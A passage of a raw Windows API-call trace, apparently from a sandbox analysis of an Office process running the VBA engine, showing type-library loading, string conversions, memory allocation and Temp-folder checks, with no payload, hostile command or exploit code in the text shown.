pptlib=0x33e4fb5478*=0x0 | out: pptlib=0x33e4fb5478*=0x1d3980655f0) returned 0x0 [0059.085] LoadTypeLib (in: szFile="C:\\Windows\\System32\\stdole2.tlb", pptlib=0x33e4fb4308*=0x0 | out: pptlib=0x33e4fb4308*=0x1d3980655f0) returned 0x0 [0059.085] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0xe4fb4328, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x60 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x60) returned 0x0 [0059.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x33e4fb4210, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0059.086] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="stdole") returned 0x506093 [0059.086] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb41e8 | out: ppvObject=0x33e4fb41e8*=0x0) returned 0x80004002 [0059.086] GetLocalTime (in: lpSystemTime=0x33e4fb4090 | out: lpSystemTime=0x33e4fb4090*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x174)) [0059.086] wcsncpy_s (in: _Destination=0x33e4fb3d40, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.086] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb3c70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.086] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.086] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4118 | out: ppvObject=0x33e4fb4118*=0x0) returned 0x80004002 [0059.086] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980655f0, ppTLibAttr=0x33e4fb4110, pDummy=0x33e4fb4118 | out: ppTLibAttr=0x33e4fb4110, pDummy=0x33e4fb4118*=0x0) returned 0x0 [0059.086] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb4108, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x33e4fb4108*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0059.086] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb4130, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0059.086] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb407a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0059.086] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb407e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0059.086] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb4082, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0059.086] wcscpy_s (in: _Destination=0x1d39d465348, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0059.086] wcscpy_s (in: _Destination=0x1d39d46534e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0059.086] wcscpy_s (in: _Destination=0x1d39d46539a, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0059.086] wcscpy_s (in: _Destination=0x1d39d4653a8, _SizeInWords=0x2f, _Source="C:\\Windows\\System32\\stdole2.tlb" | out: _Destination="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0059.086] wcscpy_s (in: _Destination=0x1d39d4653e8, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0059.086] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980655f0) returned 0x0 [0059.086] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d9d4b80, cb=0x680) returned 0x1d39da0e610 [0059.086] wcscpy_s (in: _Destination=0x1d39da0e8a8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0059.086] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0xe4fb4228, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0059.086] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="stdole") returned 0x506093 [0059.086] strcpy_s (in: _Dst=0x33e4fb4020, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0059.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4020, cbMultiByte=7, lpWideCharStr=0x33e4fb3e70, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0059.087] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0059.087] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="stdole", lHashVal=0x506093, pfName=0x33e4fb3f40, pBstrLibName=0x33e4fb3e70 | out: pfName=0x33e4fb3f40*=0, pBstrLibName=0x33e4fb3e70) returned 0x0 [0059.087] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0059.087] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x6 [0059.087] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="stdole", lHashVal=0x506093, pfName=0x33e4fb3f40, pBstrLibName=0x33e4fb3e70 | out: pfName=0x33e4fb3f40*=0, pBstrLibName=0x33e4fb3e70) returned 0x0 [0059.087] IUnknown:Release (This=0x1d3985c4c00) returned 0x5 [0059.087] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x24) returned 0x1d3982157c0 [0059.087] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7b3cf0) [0059.087] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982151c0 [0059.087] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3982151c0, cb=0x50) returned 0x1d39d76a060 [0059.087] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982157c0) [0059.087] wcsncpy_s (in: _Destination=0x33e4fb3e20, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0059.087] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0059.087] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xbe) returned 0x1d39d7d0ee0 [0059.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x1d39d7d0ee0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0059.087] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d0ee0) [0059.087] wcscpy_s (in: _Destination=0x1d39d7de690, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0059.087] wcsncpy_s (in: _Destination=0x33e4fb3e60, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0059.087] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0059.087] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xbe) returned 0x1d39d7d0ee0 [0059.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x1d39d7d0ee0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0059.087] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d0ee0) [0059.087] wcsncpy_s (in: _Destination=0x33e4fb3e20, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.087] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb3d50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.087] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.087] IUnknown:AddRef (This=0x1d3980655f0) returned 0x7 [0059.087] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4248 | out: ppvObject=0x33e4fb4248*=0x0) returned 0x80004002 [0059.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x33e4fb4210, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0059.088] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="stdole") returned 0x506093 [0059.088] IUnknown:Release (This=0x1d3980655f0) returned 0x6 [0059.088] IUnknown:Release (This=0x1d3980655f0) returned 0x5 [0059.088] GetModuleFileNameA (in: hModule=0x7ffce0820000, lpFilename=0x33e4fb53b0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0059.088] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", _SizeInBytes=0x104, _Source="\\3" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 0x0 [0059.088] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3", pptlib=0x33e4fb53a0 | out: pptlib=0x33e4fb53a0*=0x1d39da2e270) returned 0x0 [0059.096] ITypeLib:GetTypeInfoOfGuid (in: This=0x1d39da2e270, GUID=0x7ffce0bd0bd0*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), ppTInfo=0x33e4fb5530 | out: ppTInfo=0x33e4fb5530*=0x1d39d9d4b88) returned 0x0 [0059.096] malloc (_Size=0x68) returned 0x1d39bdeb2d0 [0059.096] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d9d4b88, ppTypeAttr=0x33e4fb5480, pDummy=0x0 | out: ppTypeAttr=0x33e4fb5480, pDummy=0x0) returned 0x0 [0059.096] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d9d4b88) returned 0x0 [0059.096] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d9d4b88, ppTypeAttr=0x33e4fb5420, pDummy=0x0 | out: ppTypeAttr=0x33e4fb5420, pDummy=0x0) returned 0x0 [0059.096] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x33e4fb52c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0059.096] _access (_FileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", _AccessMode=0) returned 0 [0059.096] strnlen (_Str="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", _MaxCount=0x7fffffff) returned 0x23 [0059.096] malloc (_Size=0x24) returned 0x1d39bde6c60 [0059.096] malloc (_Size=0x24) returned 0x1d39bde6bd0 [0059.096] lstrcpynA (in: lpString1=0x1d39bde6c60, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", iMaxLength=36 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\" [0059.097] lstrlenA (lpString="VBE") returned 3 [0059.097] lstrlenA (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 35 [0059.097] _msize (_Block=0x1d39bde6c60) returned 0x24 [0059.097] realloc (_Block=0x1d39bde6c60, _Size=0x27) returned 0x1d39bde6c00 [0059.097] lstrlenA (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 35 [0059.097] lstrlenA (lpString="VBE") returned 3 [0059.097] _msize (_Block=0x1d39bde6bd0) returned 0x24 [0059.097] realloc (_Block=0x1d39bde6bd0, _Size=0x27) returned 0x1d39bde6d50 [0059.097] lstrlenA (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 35 [0059.098] lstrlenA (lpString="VBE") returned 3 [0059.098] lstrcatA (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE" [0059.098] strcpy_s (in: _Dst=0x1d39bde6d50, _DstSize=0x27, _Src="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.098] _access_s (_FileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0059.099] strcpy_s (in: _Dst=0x1d39bde6d50, _DstSize=0x27, _Src="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.099] _access_s (_FileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE", _AccessMode=2) returned 0x0 [0059.099] strcpy_s (in: _Dst=0x1d39bde6d50, _DstSize=0x27, _Src="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.099] strcpy_s (in: _Dst=0x1d39bde6d50, _DstSize=0x27, _Src="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.099] strcpy_s (in: _Dst=0x1d39bde6d50, _DstSize=0x27, _Src="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.099] _access_s (_FileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0059.099] IUnknown:AddRef (This=0x1d39d9d4b88) returned 0x2 [0059.099] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d9d4b88) returned 0x0 [0059.099] StringFromCLSID (in: rclsid=0x1d39bdeb2fc*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x33e4fb53f0 | out: lplpsz=0x33e4fb53f0*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0059.099] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x27) returned 0x1d3982156a0 [0059.100] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d769d00) [0059.100] lstrlenA (lpString="VBE") returned 3 [0059.100] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0059.100] malloc (_Size=0x39) returned 0x1d39bdeb340 [0059.100] wsprintfA (in: param_1=0x1d39bdeb340, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0059.100] wsprintfA (in: param_1=0x33e4fb5418, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0059.101] free (_Block=0x1d39bdeb340) [0059.101] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982156a0) [0059.101] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x28) returned 0x1d3982156a0 [0059.102] GetWindowThreadProcessId (in: hWnd=0x10312, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0059.102] SendMessageA (hWnd=0x10312, Msg=0x84, wParam=0x0, lParam=0x12016e) returned 0x2 [0059.102] SendMessageA (hWnd=0x10312, Msg=0x20, wParam=0x10312, lParam=0x2000002) returned 0x1 [0059.102] SysStringByteLen (bstr="㼿㼿1") returned 0x5 [0059.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0059.102] SysStringByteLen (bstr="㼿㼿1") returned 0x5 [0059.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=6, lpWideCharStr=0x1d398218cd8, cchWideChar=6 | out: lpWideCharStr="????1") returned 6 [0059.103] IsCharAlphaA (ch=78) returned 1 [0059.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb54c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.103] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb5480, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.103] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.104] SysStringLen (param_1="Normal") returned 0x6 [0059.104] malloc (_Size=0x33) returned 0x1d39bdeb340 [0059.104] lstrlenA (lpString="Normal") returned 6 [0059.104] GetStringTypeA (in: Locale=0x412, dwInfoType=0x4, lpSrcStr="Normal", cchSrc=6, lpCharType=0x1d39bdeb340 | out: lpCharType=0x1d39bdeb340) returned 1 [0059.104] LCMapStringA (in: Locale=0x412, dwMapFlags=0x400000, lpSrcStr="Normal", cchSrc=7, lpDestStr=0x1d39bdeb34c, cchDest=13 | out: lpDestStr="Normal") returned 7 [0059.105] LCMapStringA (in: Locale=0x412, dwMapFlags=0x800000, lpSrcStr="Normal", cchSrc=7, lpDestStr=0x1d39bdeb359, cchDest=13 | out: lpDestStr="£Î£ï£ò£í£á£ì") returned 13 [0059.106] free (_Block=0x1d39bdeb340) [0059.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb4480, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.106] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.106] lstrlenA (lpString="Normal") returned 6 [0059.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb4430, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.107] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb4440, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.107] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.107] SysStringByteLen (bstr="㼿㼿1") returned 0x5 [0059.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0059.107] SysStringByteLen (bstr="㼿㼿1") returned 0x5 [0059.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=6, lpWideCharStr=0x1d398218cd8, cchWideChar=6 | out: lpWideCharStr="????1") returned 6 [0059.107] lstrcmpA (lpString1="????1", lpString2="Normal") returned -1 [0059.107] CompareStringA (Locale=0x412, dwCmpFlags=0x30001, lpString1="????1", cchCount1=-1, lpString2="Normal", cchCount2=-1) returned 1 [0059.107] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.107] GetLocalTime (in: lpSystemTime=0x33e4fb41d0 | out: lpSystemTime=0x33e4fb41d0*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x187)) [0059.107] wcsncpy_s (in: _Destination=0x33e4fb3e80, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.107] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb3db0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.107] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.107] GetLocalTime (in: lpSystemTime=0x33e4fb41d0 | out: lpSystemTime=0x33e4fb41d0*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x187)) [0059.107] wcsncpy_s (in: _Destination=0x33e4fb3e80, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.107] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb3db0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.108] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb4240, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.108] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb4100, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.108] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.108] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0059.108] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d44c720 [0059.108] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d76a060) [0059.108] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398215a30 [0059.108] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398215a30, cb=0x50) returned 0x1d39d76a000 [0059.108] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44c720) [0059.108] wcsncpy_s (in: _Destination=0x33e4fb3f00, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.108] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb3e30, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.108] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.108] strcpy_s (in: _Dst=0x1d39d8b1dc8, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0059.108] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.108] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=7, lpWideCharStr=0x1d398219698, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0059.108] WideCharToMultiByte (in: 